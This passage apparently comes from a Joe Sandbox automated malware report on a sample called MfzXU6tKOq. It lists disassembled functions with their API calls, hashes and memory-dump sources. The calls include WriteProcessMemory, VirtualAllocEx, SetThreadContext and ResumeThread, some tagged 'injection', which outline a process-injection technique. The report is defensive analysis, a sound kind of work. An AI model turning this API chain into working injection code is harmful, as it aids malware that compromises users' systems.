Instruction Fuzzy Hash: 96B001308DE306CEE7C03D2050695F4A53DB72F296B003844920F67647CA159184C59A

Function 006BAD88 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 006BAFDE

Strings

TOf, xrefs: 006BAF3B
TOf, xrefs: 006BAF16

Memory Dump Source

Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd

Similarity

API ID: HandleModule
String ID: TOf$TOf
API String ID: 4139908857-895418668
Opcode ID: 0774f8d2347ed70df105f4823c8331b1d6841950c9a4dec40bbc82623f3ddb64
Instruction ID: 7fa47041f1b821222f3ee2d692d3ea5f179bfcd68cf0e91ebe81d67930e1a364
Opcode Fuzzy Hash: 0774f8d2347ed70df105f4823c8331b1d6841950c9a4dec40bbc82623f3ddb64
Instruction Fuzzy Hash: 5E7113B0A00B058FD764DF69D04179ABBF6BF48304F008A2DD48AD7B50DB75E98ACB95

Function 06ABBDED Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ABC02E

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 13f4fd9971d382d4e44f1db043169fd2f9c75cafd4acb868a3f0973f5feac505
Instruction ID: abb6e81b35687ab1f3a34cb60dcbc6dcdb0da6285704108cfb66fa969499ccc7
Opcode Fuzzy Hash: 13f4fd9971d382d4e44f1db043169fd2f9c75cafd4acb868a3f0973f5feac505
Instruction Fuzzy Hash: 9CA19B71D00219DFDB50DFA8C841BEEBBB6FF48314F0485A9E809A7251DB749985CFA1

Function 06ABBDF8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ABC02E

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8f2a9d183cada3aeb2e6037f56644241e041d79c17d9308459438e8dcafa8c61
Instruction ID: cef648cff14e60d1a80b2c4e4803f49d735d4a18cfb5d1821e373ac5bb1d7cc6
Opcode Fuzzy Hash: 8f2a9d183cada3aeb2e6037f56644241e041d79c17d9308459438e8dcafa8c61
Instruction Fuzzy Hash: BC918A71D00219DFDB50DFA8C841BEEBBB6BF48314F0485A9E809A7251DB749985CFA1

Function 006B44B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 006B59C9

Memory Dump Source

Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: eed8914a3b8a63ad643d0b603e2421965d4f1717d2310b935ce3d3a13cfe5309
Instruction ID: 5cbc651235580b1328d661aff6defaac665a1d2e78c505bf7896ba942819d122
Opcode Fuzzy Hash: eed8914a3b8a63ad643d0b603e2421965d4f1717d2310b935ce3d3a13cfe5309
Instruction Fuzzy Hash: 4141D2B0C00B19CBDB24DFA9C8847CDBBB6BF48704F24855AD409BB255DB756985CF90

Function 006B590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 006B59C9

Memory Dump Source

Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1a4025c6d06d5175c3707eefe1637fa673db2821b87ff2c9fb9df5bd7f5d67e4
Instruction ID: e276d5a3d7e0d146f5f39242221f441c536bdf41b88c12fc336a6a26a336db3c
Opcode Fuzzy Hash: 1a4025c6d06d5175c3707eefe1637fa673db2821b87ff2c9fb9df5bd7f5d67e4
Instruction Fuzzy Hash: D341EEB0C00A19CEDB24DFA9C8847CDBBB6BF48304F24856AD449BB255DB756986CF90

Function 04924050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04924111

Memory Dump Source

Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 1eac3b8e8991bacbe6b475773a17f8be2e89f6be97e145a91c0b0b33e9e3bc54
Instruction ID: cb18889d6851d01f5b7e7f2c9797552ecb59c927810849eef67f87acffd42d53
Opcode Fuzzy Hash: 1eac3b8e8991bacbe6b475773a17f8be2e89f6be97e145a91c0b0b33e9e3bc54
Instruction Fuzzy Hash: 19413BB4A00315DFDB14CF99C848AAABBF5FF98314F24C459E519AB325D375A881CFA0

Function 06ABBB68 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ABBC00

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0dc837244b532bd37afd783601364032d21306f1b73fede9a9c1536885c5cf01
Instruction ID: c3f8ba07c59173e5c6cb06ce05d0477eb20ec8442718ebabe4b67b2e0324f6ab
Opcode Fuzzy Hash: 0dc837244b532bd37afd783601364032d21306f1b73fede9a9c1536885c5cf01
Instruction Fuzzy Hash: C52135B19003499FCB10DFA9C981BDEBBF5FF48310F108429E959A7251CB78A944CBA4

Function 06ABBB70 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ABBC00

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2fcdc2b986fd32e9d98e58ed1daa3782d3b8358d6ed138b72a82e9b074e4319d
Instruction ID: 984e33a95428b9c6165c4e5c77879e57afd5c5e0cc8376789c0cf8b7ad34c212
Opcode Fuzzy Hash: 2fcdc2b986fd32e9d98e58ed1daa3782d3b8358d6ed138b72a82e9b074e4319d
Instruction Fuzzy Hash: C52126B19003599FCB10DFA9C885BDEBBF5FF48310F108429E959A7251CB78A954CBA4

Function 06ABB9D1 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ABBA56

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 59027da59a1c2e5dcac7bc9d242224f5c55d6ccbf5c7c2e24dec6154b793e2c5
Instruction ID: b91c04fe46238e93f754700c547848514f8e53c6bd9033c478196a5f91a14078
Opcode Fuzzy Hash: 59027da59a1c2e5dcac7bc9d242224f5c55d6ccbf5c7c2e24dec6154b793e2c5
Instruction Fuzzy Hash: B02157B1D002088FDB50DFAAC4857EEBBF4EF48320F10842AD459A7241CB78A944CFA4

Function 06ABBC58 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ABBCE0

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9da347fcd36007c17f935cbe345eeb7f6a1cb2a22148ff65d3d4d2382ce8896c
Instruction ID: df1531db35e1d99d807bba51aea7b4c7c31fc717a002444d960bc02bb827493a
Opcode Fuzzy Hash: 9da347fcd36007c17f935cbe345eeb7f6a1cb2a22148ff65d3d4d2382ce8896c
Instruction Fuzzy Hash: 4E212AB1C002599FCB10DFAAC880BEEBBF5FF48310F108429E559A7251C7399544CFA5

Function 006BB770 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,006BD626,?,?,?,?,?), ref: 006BD6E7

Memory Dump Source

Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6a2710482f3af5fc25df780d1bf3a9337c48cafe3700a92085552a38bd804058
Instruction ID: f748308aa62e2089e56ca757473c34b00569fbd33536ee07530581d0ab3e6fe1
Opcode Fuzzy Hash: 6a2710482f3af5fc25df780d1bf3a9337c48cafe3700a92085552a38bd804058
Instruction Fuzzy Hash: DE21E3B59002489FDB10CFAAD984ADEBBF5EB48310F14842AE918A7310D374A954CFA5

Function 06ABBC60 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ABBCE0

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: afb39926733eed3a721598925ef82f1a110244adde95b0a59f914351ab5ae8ea
Instruction ID: f6c1f7d0fe7dc1eea2284cdd8cbde60a34f1bade0b121edb7796594b4853a902
Opcode Fuzzy Hash: afb39926733eed3a721598925ef82f1a110244adde95b0a59f914351ab5ae8ea
Instruction Fuzzy Hash: C42128B1C003599FCB10DFAAC880ADEBBF5FF48320F108429E559A7250CB38A544CBA5

Function 06ABB9D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ABBA56

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d5d3861f365bc056a0c53f47106bf0d6a05d874d524440a4dcf3d90182f4ba7a
Instruction ID: bb414d17c4dd764b5bd77eba842a003362ee051192533736e3eb8773a0e8a881
Opcode Fuzzy Hash: d5d3861f365bc056a0c53f47106bf0d6a05d874d524440a4dcf3d90182f4ba7a
Instruction Fuzzy Hash: B52135B1D003098FDB10DFAAC4857EEBBF8EF48320F10842AD459A7241CB78A944CFA5

Function 006BD658 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,006BD626,?,?,?,?,?), ref: 006BD6E7

Memory Dump Source

Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0aa078d627fa8d8b6520151659a045603a10042bf4b342a7676e7960a59f63f3
Instruction ID: 5c49672e0fb3a26cddebc68f3ea0e2798d4784c2b189c39e4b2e7c231d4809d5
Opcode Fuzzy Hash: 0aa078d627fa8d8b6520151659a045603a10042bf4b342a7676e7960a59f63f3
Instruction Fuzzy Hash: 9B21E0B5900249DFDB10CFA9E584ADEBBF5FF08310F14842AE958A7360D378A944CFA5

Function 06ABBAA9 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ABBB1E

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 275efadd53f37f426c7bcd9314ed189bffca4c754c244fd09c9cea3c749c2a8d
Instruction ID: 9fba27f343a17cae2c4b68ccd08d134996002bc63431482a24ae6c2eddea4b4a
Opcode Fuzzy Hash: 275efadd53f37f426c7bcd9314ed189bffca4c754c244fd09c9cea3c749c2a8d
Instruction Fuzzy Hash: CF115971C002489FCB14DFA9C844BDEBFF5EF48320F108819E559A7251C7759544CFA0

Function 06ABBAB0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ABBB1E

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c22362f53baa3f507ed1743a30b33388af026829bcb288ccfdc8adb802d5700a
Instruction ID: fa7eb33c3ac85fff33c0b9f37eceb22d6d036bfefeead073fb316f649f383b0a
Opcode Fuzzy Hash: c22362f53baa3f507ed1743a30b33388af026829bcb288ccfdc8adb802d5700a
Instruction Fuzzy Hash: 761137719002499FCB10DFAAC844BDFBFF9EF48320F108819E559A7250CB75A544CFA5

Function 06ABB921 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06ABB98A

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 77cc0d4a61a6e6984bf9c0f8c514b5fa1807ecdc99287b743847ffedbec955d5
Instruction ID: c8ae841a60fcd6a13659b8453ee613d6449d2533fb7d96c447dc801ab8ee0293
Opcode Fuzzy Hash: 77cc0d4a61a6e6984bf9c0f8c514b5fa1807ecdc99287b743847ffedbec955d5
Instruction Fuzzy Hash: 091119B1D002488FDB14EFAAC4457DEFBF9EB48324F208419D559A7250CB75A544CFA5

Function 06ABB928 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06ABB98A

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 03efdb6d1b3e73b18c9df87234c2dca5be331d992c1f719e9479d1a376623f31
Instruction ID: a104f300379d568a89e22ba4c04f75cb169db452cfb7ba73c63671a484e41956
Opcode Fuzzy Hash: 03efdb6d1b3e73b18c9df87234c2dca5be331d992c1f719e9479d1a376623f31
Instruction Fuzzy Hash: DC1128B1D002488FDB10DFAAC4457DEFBF9AB88324F208419D559A7250CB75A544CBA5

Function 06ABE5A8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06ABE60D

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 261eaf279176d617c051a315169937d8e612fa70c77498a86c3c2d98fa3d85a8
Instruction ID: 2a4713ad44b192f9bec322ac6d0d793cde0bce7697b132f175531441efd03cbd
Opcode Fuzzy Hash: 261eaf279176d617c051a315169937d8e612fa70c77498a86c3c2d98fa3d85a8
Instruction Fuzzy Hash: 9A11F2B58003499FDB50DF9AD885BDEFBF8EB48360F10841AE559A7201C375A544CFA5

Function 06AB8770 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06ABE60D

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3222c1c8df6212a0fffe82f514db3fc4410c530928445dd1c86a670ab02a4042
Instruction ID: 5248929c1d5493ea27cc96239e61baefa09d8ab1dca5964767eee120a5f5fde3
Opcode Fuzzy Hash: 3222c1c8df6212a0fffe82f514db3fc4410c530928445dd1c86a670ab02a4042
Instruction Fuzzy Hash: 4E11E0B58002499FDB50DF9AD888BDEBBF8EB48320F108419E959A7201D375A944CFA5

Function 006BAF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 006BAFDE

Memory Dump Source

Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6e4ab722781e310593ddeab1107216fd185eda1d4343597544d03ff002742036
Instruction ID: 312576766baf236fce9040c8882036dc6aa71f52bc7b1e13fe31079b94267ddd
Opcode Fuzzy Hash: 6e4ab722781e310593ddeab1107216fd185eda1d4343597544d03ff002742036
Instruction Fuzzy Hash: E711E0B5C006498FCB10DF9AD444ADEFBF9EF88324F10842AD469A7610D379A585CFA6

Function 06CE0BD0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841959385.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ad024cae0aae3013f656a4152343cd79055aa23558fd43660b086d1f447a767
Instruction ID: 149dce94e23b6dfaac95684319c0e6a1a4c4e881118d947d5a683b4874b14dfd
Opcode Fuzzy Hash: 4ad024cae0aae3013f656a4152343cd79055aa23558fd43660b086d1f447a767
Instruction Fuzzy Hash: 1531AD78E103489FDB08DFA9D840ADDBBF6FF48310F04806AE414E7221D7709955CBA0

Function 0065D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1837906605.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f1790639c8ef17e260144617ae2daf2f1b2b6199b31d49355381dbf988a1ce
Instruction ID: d34fd800a905726abf6f03380936d307695fd11d96428ada85970a046ece7b78
Opcode Fuzzy Hash: 05f1790639c8ef17e260144617ae2daf2f1b2b6199b31d49355381dbf988a1ce
Instruction Fuzzy Hash: 7A212871500204DFDB15DF14D9C0B2ABFA6FB94315F20C169DD094B396C336E85AC6A2

Function 0066D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1837949000.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0066D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff361de48d41513a1002ec9ce154a9cce59dd6875573a0dace8bb74a4c95413
Instruction ID: 9cb1850acd4e215c4ea28e279f12a5c31ee78934298a4e887603374bc02bcacd
Opcode Fuzzy Hash: 5ff361de48d41513a1002ec9ce154a9cce59dd6875573a0dace8bb74a4c95413
Instruction Fuzzy Hash: 5A212671A04240EFDB05DF14D9D0B26BBAAFB88314F24C66DEA094B396C336D946CA61

Function 0066D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1837949000.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0066D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c20b5ecda9a848128f7e7f1a070fcddff4e7754c83876196b0781d548b7d1c
Instruction ID: f6fe4102dcc62fa3ac9952f31d2ab22e558d32636d0a2fbdf161956e37a5a797
Opcode Fuzzy Hash: 14c20b5ecda9a848128f7e7f1a070fcddff4e7754c83876196b0781d548b7d1c
Instruction Fuzzy Hash: CB21FF75A04240DFCB14DF24D984B26BBA6EB88314F24C569E80A4B396C33BD847CAA1

Function 0065D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1837906605.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 92472c010d5531b74f23c8a14a02d39cfe04f21e4b43c731db1ecd7a558518aa
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 8911DF72404240DFDB16CF00D5C4B56BFB2FB94324F24C2A9DC090B296C33AE85ACBA1

Function 0066D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1837949000.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0066D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 8c7ed97753d9cc6fe7bbd012e2e11cae8e220831904c1e186971dd4fcf73d4d5
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: C8118E75A04280DFDB15CF14D5C4B55BB62FB84314F24C6AAD8494B756C33AD84ACB61

Function 0066D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1837949000.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0066D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66d000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: ee01581d88d49c9814b32adc0ebdda1ea090fc9d469ec961d0fe3b53458c5f6b
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 5D11BB75A04280DFCB12CF10C5D4B55BBA2FB84314F28C6AAD9494B396C33AD84ACB61

Function 0065D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1837906605.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ced6c9c2b8da21cb6b580b6af36985bc047b7e4ce051bd056ce793560165659
Instruction ID: c78294ea50410b6d8bcd0ba756789caba38a28e0556e38c4ab0c3c3d30dcf8aa
Opcode Fuzzy Hash: 2ced6c9c2b8da21cb6b580b6af36985bc047b7e4ce051bd056ce793560165659
Instruction Fuzzy Hash: DC01F731008300DAE7208A25CD847A7BF99EF49322F18C82AED080A2C6C239D844C671

Function 0065D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1837906605.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae0fb0b67f1eba4a4bdf848a20f43d36e0ad3ea3a671d80cb787f8f54aba063
Instruction ID: e9d62ff7ec0cb31d90590c5c6a76e0f576ad193322b36e344870ebaa60b35071
Opcode Fuzzy Hash: cae0fb0b67f1eba4a4bdf848a20f43d36e0ad3ea3a671d80cb787f8f54aba063
Instruction Fuzzy Hash: CDF062714043449EE7208A16DC84BA2FFA9EF55725F18C45AED084A3D6C2799844CAB1

Function 06CE0B58 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841959385.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f567aca31c3cc48bbc4a175790d52b7e094cd514b34dc744ed654e04c76e93d
Instruction ID: b02edc37e6c84cd91f2d5a8f5a83c584af549dea2d45f36c5c2a9ee27d06d1df
Opcode Fuzzy Hash: 3f567aca31c3cc48bbc4a175790d52b7e094cd514b34dc744ed654e04c76e93d
Instruction Fuzzy Hash: 46F027B0E043519EE350CF2DC404A6BBFF1FF48254B14095DD045EB241EB754402CB90

Function 06CE0B68 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841959385.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3167b18b8c664c62cc1219090082ee8465b81366f0d264a4647498ccec1fb7
Instruction ID: 4f95eff0b91af4c9ee26a8bca99c44a066a8db9f30995e91b8293120b034f63c
Opcode Fuzzy Hash: 6f3167b18b8c664c62cc1219090082ee8465b81366f0d264a4647498ccec1fb7
Instruction Fuzzy Hash: 67E039B0E0031A9FD790DF6E8949A6BBBF4BF48604F104829D409E6200EBB08A108BE0

Function 06CE0BBB Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841959385.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49318eed26ddecdc6bf6d0bcf3a90066653559e8825e26ee8e196838ccf25752
Instruction ID: b4276ade40d7f816d89c73c560a000acd72916b8eea50970d935ea875bd0276c
